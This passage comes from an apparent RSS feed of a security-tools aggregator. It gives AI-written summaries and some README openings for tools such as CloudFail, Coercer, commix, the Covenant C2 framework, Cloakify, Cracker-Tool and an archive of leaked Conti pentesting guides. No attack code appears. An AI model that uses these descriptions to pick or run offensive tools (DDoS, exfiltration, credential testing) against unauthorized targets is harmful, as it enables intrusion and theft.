&lt;div align="center"&gt;
&lt;img src="https://img.shields.io/badge/v3.0.0-Bionic_Hunter-blueviolet?style=for-the-badge" alt="v3.0.0"&gt;
&lt;h1 id="claude-bug-bounty"&gt;Claude Bug Bounty&lt;/h1&gt;
&lt;h3 id="the-ai-powered-agent-harness-for-professional-bug-bounty-hunting"&gt;The AI-Powered Agent Harness for Professional Bug Bounty Hunting&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Your AI copilot that sees live traffic, remembers past hunts, and hunts autonomously.&lt;/em&gt;&lt;/p&gt;</description></item><item><title>cli</title><link>https://rainmana.github.io/hackyfeed/tools/cloudgraphdev-cli/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cloudgraphdev-cli/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CloudGraph is an open-source tool that serves as both a GraphQL API and a Cloud Security Posture Management (CSPM) solution, providing comprehensive compliance checks and type-safe asset inventories across AWS, Azure, GCP, and Kubernetes. Key features include automatic query validation, historical data snapshots, and a unified endpoint for querying resources across multiple cloud environments. Designed for ease of use, CloudGraph allows users to quickly assess their cloud infrastructure and maintain compliance with various security standards.&lt;/p&gt;</description></item><item><title>cli</title><link>https://rainmana.github.io/hackyfeed/tools/smallstep-cli/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/smallstep-cli/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Step CLI is a robust command-line interface tool designed for building and managing Public Key Infrastructure (PKI) systems and workflows, providing functionalities for cryptographic operations and X.509 certificate management. Key features include the ability to create, revoke, and validate certificates, generate key pairs and Certificate Signing Requests (CSRs), and automate certificate issuance via integration with the step-ca server and ACME-compliant CAs. The tool simplifies the setup and maintenance of secure TLS/HTTPS environments, making it essential for developers and system administrators working with PKI.&lt;/p&gt;</description></item><item><title>Cloakify</title><link>https://rainmana.github.io/hackyfeed/tools/trycatchhcf-cloakify/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trycatchhcf-cloakify/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CloakifyFactory is a tool designed for text-based steganography that transforms any file type into a list of innocuous strings, enabling covert data exfiltration and infiltration while evading detection by data loss prevention systems and analysts. Key features include the ability to cloak various file formats, social engineering capabilities to mislead security reviews, and the option to add noise for enhanced resistance against frequency analysis. It serves as an educational tool for introducing concepts of cryptography and steganography, though it is not secure for sensitive data without prior encryption.&lt;/p&gt;</description></item><item><title>cloud_enum</title><link>https://rainmana.github.io/hackyfeed/tools/initstring-cloud_enum/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/initstring-cloud_enum/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; cloud_enum is a multi-cloud OSINT tool designed for the enumeration of public resources across AWS, Azure, and Google Cloud Platform. Its notable features include the ability to identify open and protected cloud resources, such as S3 buckets, Azure storage accounts, and Firebase databases, utilizing customizable keyword inputs for comprehensive scanning. Although currently less maintained, the tool is positioned for migration to the Nuclei framework for improved functionality and community contributions.&lt;/p&gt;</description></item><item><title>CloudBrute</title><link>https://rainmana.github.io/hackyfeed/tools/0xsha-cloudbrute/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xsha-cloudbrute/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CloudBrute is a reconnaissance tool designed for uncovering infrastructure, files, and applications across major cloud providers, including Amazon, Google, Microsoft, and others. Its primary use case targets bug bounty hunters, red teamers, and penetration testers, providing features such as black-box detection, user-agent and proxy randomization, and modular customization to facilitate efficient cloud enumeration and vulnerability assessment without requiring authentication.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cloudbrute"&gt;CloudBrute&lt;/h1&gt;
&lt;p&gt;A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.&lt;/p&gt;</description></item><item><title>CloudFail</title><link>https://rainmana.github.io/hackyfeed/tools/m0rtem-cloudfail/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m0rtem-cloudfail/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CloudFail is a reconnaissance tool designed to uncover the origin server of targets protected by Cloudflare by utilizing three distinct attack phases: misconfigured DNS scans, querying the Crimeflare database, and brute-forcing over 2500 subdomains. The tool operates through Tor to maintain anonymity while performing these scans, making it particularly useful for security researchers conducting penetration tests or academic inquiries. Key features include seamless integration with Tor for privacy, a focus on potential DNS misconfigurations, and an easy-to-use scanning interface.&lt;/p&gt;</description></item><item><title>Coercer</title><link>https://rainmana.github.io/hackyfeed/tools/p0dalirius-coercer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/p0dalirius-coercer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Coercer is a Python tool designed for assessing and exploiting Remote Procedure Calls (RPCs) on Windows servers, facilitating the coercion of authentication onto arbitrary machines. Key features include the ability to list and connect to SMB pipes, invoke vulnerable RPC functions with random UNC path generation, and customizable export formats such as SQLite, JSON, and XSLX for scan and fuzz modes. It supports both authenticated and unauthenticated scans, making it valuable for security assessments and penetration testing.&lt;/p&gt;</description></item><item><title>collection-document</title><link>https://rainmana.github.io/hackyfeed/tools/tom0li-collection-document/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tom0li-collection-document/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Collection Document repository is a curated compilation of quality safety articles aimed at enhancing knowledge in various cybersecurity domains. Its primary use case includes providing resources on topics such as penetration testing, threat detection, cloud security, and personal security, among others. Notable features of the collection include links to deep dives into specialized security areas, ongoing updates, and insights into modern security solutions like AI safety and zero trust architecture.&lt;/p&gt;</description></item><item><title>commix</title><link>https://rainmana.github.io/hackyfeed/tools/commixproject-commix/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/commixproject-commix/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Commix is an open-source penetration testing tool designed for automating the detection and exploitation of command injection vulnerabilities in web applications. It supports multiple Python versions and includes extensive documentation with usage examples, facilitating ease of deployment and operation for security professionals. Notable features include comprehensive exploitation capabilities and a user-friendly interface for navigating various commands and options.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="left"&gt;
 &lt;img alt="CommixProject" src="https://commixproject.com/images/logo.png" height="120" /&gt;
 &lt;p align="left"&gt;
 &lt;a href="https://github.com/commixproject/commix/actions/workflows/builds.yml"&gt;&lt;img alt="Builds Tests" src="https://github.com/commixproject/commix/actions/workflows/builds.yml/badge.svg"&gt;&lt;/a&gt;
 &lt;a href="http://www.python.org/download/"&gt;&lt;img alt="Python 2.6|2.7|3.x" src="https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/commixproject/commix/blob/master/LICENSE.txt"&gt;&lt;img alt="GPLv3 License" src="https://img.shields.io/badge/license-GPLv3-red.svg"&gt;&lt;/a&gt;
 &lt;a href="https://github.com/commixproject/commix/issues?q=is%3Aissue+is%3Aclosed"&gt;&lt;img alt="GitHub closed issues" src="https://img.shields.io/github/issues-closed-raw/commixproject/commix.svg?colorB=ff0000"&gt;&lt;/a&gt;
 &lt;a href="https://x.com/commixproject"&gt;&lt;img alt="X" src="https://img.shields.io/badge/x-@commixproject-blue.svg"&gt;&lt;/a&gt;
 &lt;/p&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Commix&lt;/strong&gt; (short for [&lt;strong&gt;comm&lt;/strong&gt;]and [&lt;strong&gt;i&lt;/strong&gt;]njection e[&lt;strong&gt;x&lt;/strong&gt;]ploiter) is an open source penetration testing tool, written by &lt;strong&gt;&lt;a href="https://github.com/stasinopoulos"&gt;Anastasios Stasinopoulos&lt;/a&gt;&lt;/strong&gt; (&lt;strong&gt;&lt;a href="https://x.com/ancst"&gt;@ancst&lt;/a&gt;&lt;/strong&gt;), that automates the detection and exploitation of &lt;strong&gt;&lt;a href="https://www.owasp.org/index.php/Command_Injection"&gt;command injection&lt;/a&gt;&lt;/strong&gt; vulnerabilities.&lt;/p&gt;</description></item><item><title>console</title><link>https://rainmana.github.io/hackyfeed/tools/phasehq-console/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/phasehq-console/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Phase Console is an open-source platform designed for engineering teams to efficiently manage and secure application secrets throughout the development lifecycle. Its notable features include a comprehensive dashboard for secret management, role-based access control, seamless integration with various CI/CD platforms and Kubernetes, as well as SDK support for multiple programming languages, enabling secure secret injection and synchronization across environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;div align="center"&gt;
 &lt;!-- Phase Console --&gt;
 &lt;a href="https://phase.dev"&gt;
 &lt;img height="120" width="450" src="img/phase-lattice-logo.svg" alt="Phase"&gt;
 &lt;/a&gt;
 &lt;h5&gt;Repos&lt;/h5&gt;
 &lt;p&gt;
 &lt;a href="https://github.com/phasehq/docs"&gt;Docs&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/cli"&gt;CLI&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/node-sdk"&gt;Node SDK&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/python-sdk"&gt;Python SDK&lt;/a&gt;
 &lt;br/&gt;
 &lt;a href="https://github.com/phasehq/golang-sdk"&gt;Golang SDK&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/kubernetes-secrets-operator/tree/main/phase-console"&gt;Helm Chart&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/kubernetes-secrets-operator"&gt;Kubernetes Operator&lt;/a&gt; |
 &lt;a href="https://github.com/phasehq/terraform-provider-phase"&gt;Terraform Provider&lt;/a&gt;
 &lt;/p&gt;</description></item><item><title>ContainerSSH</title><link>https://rainmana.github.io/hackyfeed/tools/containerssh-containerssh/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/containerssh-containerssh/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ContainerSSH is an SSH server designed to dynamically launch containers in Kubernetes and Docker, primarily aimed at facilitating lab environments, debugging production systems, and running honeypots. Notable features include ephemeral container management with automatic cleanup, secure and logged access for developers, and comprehensive auditing capabilities that allow for monitoring and analysis of SSH attack patterns. This tool enhances security workflows by leveraging containerization to isolate user activities and preserve system integrity.&lt;/p&gt;</description></item><item><title>content</title><link>https://rainmana.github.io/hackyfeed/tools/complianceascode-content/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/complianceascode-content/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ComplianceAsCode/content is a framework designed to facilitate the creation and maintenance of security policy content for various platforms, including Linux distributions and applications like Firefox. It generates SCAP content, Ansible playbooks, and Bash scripts from easily editable YAML rule files, allowing organizations to automate compliance checks and remediations. Notable features include a powerful build system that reduces redundancy, multi-format outputs tailored to different organizational needs, and comprehensive documentation resources for users.&lt;/p&gt;</description></item><item><title>conti-pentester-guide-leak</title><link>https://rainmana.github.io/hackyfeed/tools/forbiddenprogrammer-conti-pentester-guide-leak/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/forbiddenprogrammer-conti-pentester-guide-leak/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;conti-pentester-guide-leak&amp;rdquo; repository serves as an archive for leaked pentesting materials associated with the Conti ransomware group, providing insights into their methodologies and tools. It includes guides on a variety of techniques such as data exfiltration, network exploitation, and the usage of tools like Metasploit and Cobalt Strike. This material is aimed at enhancing pentesting skills for security professionals and aiding defenders in detecting and mitigating similar attacks, while emphasizing its usage for educational purposes only.&lt;/p&gt;</description></item><item><title>copacetic</title><link>https://rainmana.github.io/hackyfeed/tools/project-copacetic-copacetic/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/project-copacetic-copacetic/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Copa is a CLI tool designed to directly patch container images for vulnerabilities without requiring a full rebuild, thereby enhancing DevSecOps workflows. Leveraging vulnerability scan results from tools like Trivy, Copa reduces the operational downtime associated with patching, minimizes storage needs by creating only additional patch layers, and allows any user to perform patches, irrespective of image ownership. Its extensible architecture supports multiple package managers and vulnerability report formats, making it adaptable to various container ecosystems.&lt;/p&gt;</description></item><item><title>copilot-api</title><link>https://rainmana.github.io/hackyfeed/tools/ericc-ch-copilot-api/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ericc-ch-copilot-api/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Copilot API Proxy is a reverse-engineered tool that enables access to the GitHub Copilot API through an OpenAI and Anthropic-compatible interface, allowing integration with various platforms that support these APIs. Key features include a user-friendly web dashboard for monitoring API usage, flexible authentication options, rate limit management, and the capability to integrate with Claude Code for enhanced coding assistance. This proxy is not officially supported by GitHub and should be used responsibly to prevent account restrictions.&lt;/p&gt;</description></item><item><title>Corsy</title><link>https://rainmana.github.io/hackyfeed/tools/s0md3v-corsy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/s0md3v-corsy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Corsy is a lightweight CORS misconfiguration scanner designed to identify vulnerabilities in web applications&amp;rsquo; Cross-Origin Resource Sharing implementations. It features a versatile command-line interface that supports scanning URLs directly or from files, utilizes customizable HTTP headers, and provides options for threading, request delays, and exporting results to JSON. Notably, it implements a comprehensive suite of tests to uncover various CORS-related bypass opportunities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 align="center"&gt;
 &lt;br&gt;
 &lt;a href="https://github.com/s0md3v/Corsy"&gt;&lt;img src="https://i.ibb.co/K0Z7X99/corsy.png" alt="Corsy"&gt;&lt;/a&gt;
 &lt;br&gt;
 Corsy
 &lt;br&gt;
&lt;/h1&gt;
&lt;h4 align="center"&gt;CORS Misconfiguration Scanner&lt;/h4&gt;
&lt;p align="center"&gt;
 &lt;a href="https://github.com/s0md3v/Corsy/releases"&gt;
 &lt;img src="https://img.shields.io/github/release/s0md3v/Corsy.svg"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/s0md3v/Corsy/issues?q=is%3Aissue+is%3Aclosed"&gt;
 &lt;img src="https://img.shields.io/github/issues-closed-raw/s0md3v/Corsy.svg"&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Covenant</title><link>https://rainmana.github.io/hackyfeed/tools/cobbr-covenant/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cobbr-covenant/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Covenant is a .NET command and control framework designed for red teaming, facilitating offensive .NET tradecraft and collaborative operations through a web-based interface. It supports cross-platform functionality across Linux, MacOS, and Windows, and features multi-user collaboration, dynamic C# compilation, inline code execution, and secure communication via an encrypted key exchange. Notably, Covenant offers API-driven extensibility and a user-friendly dashboard that allows red teamers to execute and manage operations effectively.&lt;/p&gt;</description></item><item><title>Cpp2IL</title><link>https://rainmana.github.io/hackyfeed/tools/samboycoding-cpp2il/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/samboycoding-cpp2il/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cpp2IL is a tool designed to reverse Unity&amp;rsquo;s IL2CPP build process, converting Unity games&amp;rsquo; compiled binary formats back into their original managed DLLs. Its primary use case is for developers and reverse engineers working with Unity-based applications, providing functionalities such as output format customization and a planned plugin system for extended compatibility. Noteworthy features include a major rewrite for enhanced flexibility, reliance on LibCpp2IL for metadata processing, and the upcoming integration of an intermediate representation (ISIL) for improved analysis of various instruction sets.&lt;/p&gt;</description></item><item><title>Cr3dOv3r</title><link>https://rainmana.github.io/hackyfeed/tools/d4vinci-cr3dov3r/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/d4vinci-cr3dov3r/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cr3dOv3r is a Python-based tool designed for detecting credential reuse vulnerabilities by querying public data leaks and verifying whether compromised credentials can access popular websites. Its notable features include integration with the Have I Been Pwned API for leak search and functionality to test the validity of leaked passwords against various online platforms while detecting CAPTCHA prompts. This tool is particularly useful for penetration testing and security assessments.&lt;/p&gt;</description></item><item><title>Cracker-Tool</title><link>https://rainmana.github.io/hackyfeed/tools/cracker911181-cracker-tool/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cracker911181-cracker-tool/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cracker-Tool is a multifunctional hacking and penetration testing toolbox designed for Termux users, featuring a variety of capabilities including IP tools, subdomain scanning, DDoS attacks, SQL injections, and more. Notable functionalities include Cloudflare bypass for DDoS, identity generators, and a variety of administrative tools, making it a comprehensive resource for security testing. The tool is implemented in Python and Bash, emphasizing ease of installation and set up within the Termux environment.&lt;/p&gt;</description></item><item><title>crawlergo</title><link>https://rainmana.github.io/hackyfeed/tools/qianlitp-crawlergo/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/qianlitp-crawlergo/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; crawlergo is a robust web vulnerability scanner that utilizes a headless Chrome browser to collect URLs and interact with web pages, capable of intelligent form submission and JavaScript event triggering. Its key features include automatic URL de-duplication, support for different browser environments, request proxying, and the ability to push results to passive vulnerability scanners, making it an essential tool for comprehensive web application security assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="crawlergo"&gt;crawlergo&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://img.shields.io/badge/chromedp-v0.5.2-brightgreen.svg" alt="chromedp"&gt; &lt;a href="https://www.blackhat.com/eu-21/arsenal/schedule/index.html#crawlergo-a-powerful-browser-crawler-for-web-vulnerability-scanners-25113"&gt;&lt;img src="https://img.shields.io/badge/BlackHat%20Europe-2021%20Arsenal-blue.svg" alt="BlackHat EU Arsenal"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>crlfuzz</title><link>https://rainmana.github.io/hackyfeed/tools/dwisiswant0-crlfuzz/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dwisiswant0-crlfuzz/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CRLFuzz is a specialized tool for detecting CRLF injection vulnerabilities in web applications, developed in Go for high performance. It offers flexible scanning options, including targeting individual URLs or multiple URLs from a list, and provides various command line flags to customize request methods, output results to files, and adjust concurrency levels. Notable features include support for custom headers, proxy usage, and integration capabilities with other security tools through standard input.&lt;/p&gt;</description></item><item><title>CrossLinked</title><link>https://rainmana.github.io/hackyfeed/tools/m8sec-crosslinked/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/m8sec-crosslinked/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CrossLinked is a LinkedIn enumeration tool that leverages search engine scraping to extract valid employee names from targeted organizations, enabling enumeration without the need for API keys or direct LinkedIn access. It supports customizable naming conventions for output formatting and offers features like proxy rotation and the ability to parse data into both text and CSV files. This tool is particularly useful for security researchers and penetration testers looking to gather information about potential targets.&lt;/p&gt;</description></item><item><title>Crucix</title><link>https://rainmana.github.io/hackyfeed/tools/calesthio-crucix/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/calesthio-crucix/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Crucix is an open-source intelligence tool that aggregates real-time data from 27 diverse sources—including satellite fire detection, flight tracking, and economic indicators—into a single, self-hosted dashboard updated every 15 minutes. Its primary use case is to provide researchers, journalists, and analysts with accessible, cross-correlated insights without relying on cloud services or subscriptions. Notable features include integration with LLMs for two-way interaction, customizable alerts via Telegram and Discord, and a user-friendly interface that simplifies monitoring complex global events.&lt;/p&gt;</description></item><item><title>crypto-attacks</title><link>https://rainmana.github.io/hackyfeed/tools/jvdsn-crypto-attacks/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jvdsn-crypto-attacks/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &lt;code&gt;crypto-attacks&lt;/code&gt; repository provides Python implementations of various cryptographic attacks and utilities, primarily focusing on attacking RSA using methods such as the Boneh-Durfee attack. Notable features include the ability to customize parameters for specific attacks, integration with SageMath for advanced mathematical computations, and a structured approach for unit testing and utilizing the attack scripts.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Python implementations of cryptographic attacks and utilities.&lt;/p&gt;
&lt;h2 id="requirements"&gt;Requirements&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.sagemath.org/"&gt;SageMath&lt;/a&gt; with Python 3.9&lt;/li&gt;
&lt;li&gt;&lt;a href="https://pycryptodome.readthedocs.io/"&gt;PyCryptodome&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can check your SageMath Python version using the following command:&lt;/p&gt;</description></item><item><title>cs-suite</title><link>https://rainmana.github.io/hackyfeed/tools/securityftw-cs-suite/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/securityftw-cs-suite/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Cloud Security Suite (cs-suite) is a command-line tool designed for conducting security audits on various cloud environments, including AWS, GCP, Azure, and DigitalOcean. Its primary use case revolves around gathering data for Lynis audits, allowing users to specify environments, IP addresses, and user credentials while generating audit logs in JSON format for integration with SIEM tools. Notable features include the ability to handle user authentication, option to wipe previous audit reports, and flexible configurations for different cloud platforms.&lt;/p&gt;</description></item><item><title>CS7038-Malware-Analysis</title><link>https://rainmana.github.io/hackyfeed/tools/ckane-cs7038-malware-analysis/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ckane-cs7038-malware-analysis/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CS7038-Malware-Analysis is a repository designed for educational purposes in the field of malware analysis, specifically for the University of Cincinnati&amp;rsquo;s course. It serves as a comprehensive resource for students, providing access to course materials and related multimedia content, including instructional videos on malware analysis techniques and methodologies.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="cs7038-malware-analysis"&gt;CS7038-Malware-Analysis&lt;/h1&gt;
&lt;p&gt;Course Repository for University of Cincinnati Malware Analysis Class (CS[567]038)&lt;/p&gt;
&lt;p&gt;Public URL: &lt;a href="https://class.malware.re/"&gt;https://class.malware.re/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;YouTube Videos: &lt;a href="https://www.youtube.com/channel/UC0qfXmyAbSsmnisGQn1fAJA"&gt;https://www.youtube.com/channel/UC0qfXmyAbSsmnisGQn1fAJA&lt;/a&gt;&lt;/p&gt;</description></item><item><title>CTF</title><link>https://rainmana.github.io/hackyfeed/tools/crypto-cat-ctf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/crypto-cat-ctf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Crypto-Cat/CTF repository serves as a comprehensive resource for Capture The Flag (CTF) challenges, offering write-ups, scripts, and files aligned with video walkthroughs. Its primary use case is to aid users in learning and solving various CTF challenges through curated links to additional resources, including pentesting and reverse engineering tools. Notable features include an extensive directory of CTF platforms, resources for blue team activities, and a collection of cybersecurity educational content.&lt;/p&gt;</description></item><item><title>CTF-notes</title><link>https://rainmana.github.io/hackyfeed/tools/shiva108-ctf-notes/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shiva108-ctf-notes/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The CTF-notes repository provides a comprehensive collection of resources and structured notes aimed at aiding individuals in preparing for Capture The Flag (CTF) competitions and penetration testing exams, such as the OSCP. It includes detailed checklists, exploitation techniques for various platforms, vulnerability payloads, and methodologies for offensive security. Noteworthy features include organized sections for post-exploitation tactics, memory forensics, and specific vulnerabilities, alongside a dedicated cheat sheet repository for quick reference during assessments.&lt;/p&gt;</description></item><item><title>ctf-skills</title><link>https://rainmana.github.io/hackyfeed/tools/ljagiello-ctf-skills/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ljagiello-ctf-skills/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The ctf-skills repository provides an extensive collection of agent skills designed to facilitate the solving of Capture The Flag (CTF) challenges across various domains, including web exploitation, binary pwn, reverse engineering, and more. Notable features include support for multiple installation methods, a comprehensive tool installer script, and detailed skill documentation for on-demand use, allowing users to efficiently integrate the necessary tools as challenges arise. It is compatible with any tool adhering to the Agent Skills specification, enhancing its versatility in competitive cybersecurity contexts.&lt;/p&gt;</description></item><item><title>CTFCrackTools</title><link>https://rainmana.github.io/hackyfeed/tools/0chencc-ctfcracktools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0chencc-ctfcracktools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; CTFCrackTools X is a next-generation, node-based toolkit designed for CTF (Capture The Flag) competitions, offering an extensive set of over 43 built-in algorithms for encoding, cryptography, and hashing. Key features include a visual workflow that allows users to construct custom encoding and decoding processes intuitively, and native support across Windows, macOS, and Linux platforms without the need for additional runtime installations. The tool emphasizes performance and extensibility, streamlining the process of handling various CTF challenges.&lt;/p&gt;</description></item><item><title>CTFever</title><link>https://rainmana.github.io/hackyfeed/tools/uniiemstudio-ctfever/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/uniiemstudio-ctfever/</guid><description>&lt;blockquote&gt;
